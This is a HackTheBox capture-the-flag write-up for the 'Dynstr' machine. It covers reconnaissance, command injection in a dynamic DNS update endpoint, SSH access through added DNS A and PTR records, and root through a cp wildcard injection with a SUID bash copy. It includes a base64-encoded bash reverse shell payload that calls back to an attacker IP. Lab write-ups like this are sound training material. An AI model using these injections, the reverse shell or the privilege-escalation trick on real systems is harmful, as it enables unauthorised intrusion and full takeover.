HackTheBox-Dynstr

Hello everyone , I hope you are doing well , in this post I will be sharing my writeup for HTB Dynstr machine which was rated as medium level difficulty, starting with the reconnaissance phase we discovered 3 ports ssh, dns and http out of which only http was interesting for us , on the home page we found credentials which would be use for authenticating on making a request to /nic/ which we can find it through gobuster or any other fuzzing tool. We can get command injection in the hostname parameter and get a reverse shell . From the machine we can get private ssh key of a user from some debug output and in order to login through ssh we needed to a dynamic dns because it was only allowing connection from specific hostname , since ssh was using dns we needed to add A and PTR record in order to login and after that we could see that user can run a script as root user which was using cp command with a wildcard (*) so we can abuse this and get root.

NMAP

nmap -p- -sC -sV --min-rate 5000 10.129.6.34
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyna DNS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On webserver we can see an html page refereing to Dyna DNS or “Dynamic DNS”

Scrolling down a bit we can see few domain names plus credentials

At the end we’ll find a domain name dyna.htb

So let’s add those domain names in /etc/hosts file

All those domain lead up to the same page

Maybe we’ll need to fuzz for subdomain so let’s start with dyna.htb

We may need to filter out with 10909 characters

I found nothing so I tried checking any exploits for ISC BIND 9.16.1 , it had an buffer overflow but there was no exploit for it

let’s just fuzz for files and directories using gobuster

This kept giving me errors so I increased the threads to 60 and it worked

Going to nic , it doesn't show anything

Further fuzzing for files we can see update

Here we get badauth , now remember we found credentials on the home page so let’s use them here , we can authenticate them through curl

And now we get nochg our_vpn_ip

On googling nochg

This resulted in no-ip dynamic dnsso on seeing the response codes

We can see that nochg is telling us that we haven’t supplied a hostname to update so let’s dig deeper on how to update a dns record

https://www.noip.com/integrate/request

So we can update dns record however it needs to be valid so going back to web page where we found potential domain names those are valid

dnsalias.htb
dynamicdns.htb
no-ip.htb

I intercepted the request with burp suite , added a header Authorization : Basic ZHluYWRuczpzbmRhbnlk where base64 encoded text holds username and password and tried to update either one of the domain name

But kept getting error so I added a random subdomain arz.dnsalisa.htb

This response tells that hostname is updated but we can’t do anything with it so I tried to do command injection here

Following this payload list , I was able to confirm command injection

https://github.com/payloadbox/command-injection-payload-list

Now to get a shell that would be needed to get url encoded but it’s a pain in doing that so I will first base64 encode the bash reverse shell ,pipe it to decode and then pipe it to bash

$(echo+L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjU3LzIyMjIgMD4mMSc=+|+base64+-d+|+bash)

Going into bindmgr's home directory I found some files and one of them was a script file , a script just records every command you type on the terminal ,so on looking into script file we'll find something interesting

Let’s just put this in a bash script where we would echo the ssh key with -e which would enable use of escape characters but this didn't work

It turns out it had space between lines so manually had to remove them and then I just used python3 to print the key

But I wasn’t able to login with id_rsa key because there’s host name involved in authroized_keys file

Looking at update file source code we can see nsupdate being used with a key /etc/bind/ddns.key

I tried to add a domain name but it failed

Eventually I figured out as we needed to use a different key so going to /etc/bind

There’s infra.key which makes sense that we are adding dns record for infra domain

If we do nslookup on this domain we’ll get a response which means this record has been added which points to our IP

But still we won’t be able to login through ssh as use of dns is enabled as ssh goes through process of reverse dns lookup so domain name is resolving to IP but IP address won’t resolve to domain name so we need to add PTR record for this purpose

This what I followed in order to add a PTR record also deleted the A record I added

https://superuser.com/questions/977132/when-using-nsupdate-to-update-both-a-and-ptr-records-why-do-i-get-update-faile

Here the space is necessary after adding A record, so now let's try ssh into the machine

Doing sudo -l we can see that this can run /usr/local/bin/bindmgr.sh as ALL meaning we can run this as root user

Here it’s checking for .version file and it's using wildcard * to copy everything

We can see that .version is in /etc/ folder so this file will run there

What we can do is create .version file and add 42 in it as that's what the contents of original file has

Now if we look at that script we can see that first .version will be checked if the contents of that file is less than or equal to .version file in /etc/bind/named.bindmgr so that's why we are going to keep it 42,next cp is being used like this cp .version * , it's going to copy .version file fomr current directory plus everything else so here we can do wildcard injection

So first I’ll copy /bin/bash to current directory and make it a SUID binary

Now here the wildcard injection takes place , we are going to abuse it by creating a file named --preserve=mode what it will do is while copying it will retain the attributes of the files that are in this directory , like bash has SUID so it's going to retain those attributes and copy it to /etc/bind/named.bindmgr which is owned by root

Now just run the script as sudo

If we go to /etc/bind/named.bindmgr we'll see that it has bash as SUID binary

And we have rooted this machine !!!

References

BS CS undergraduate | CTF Player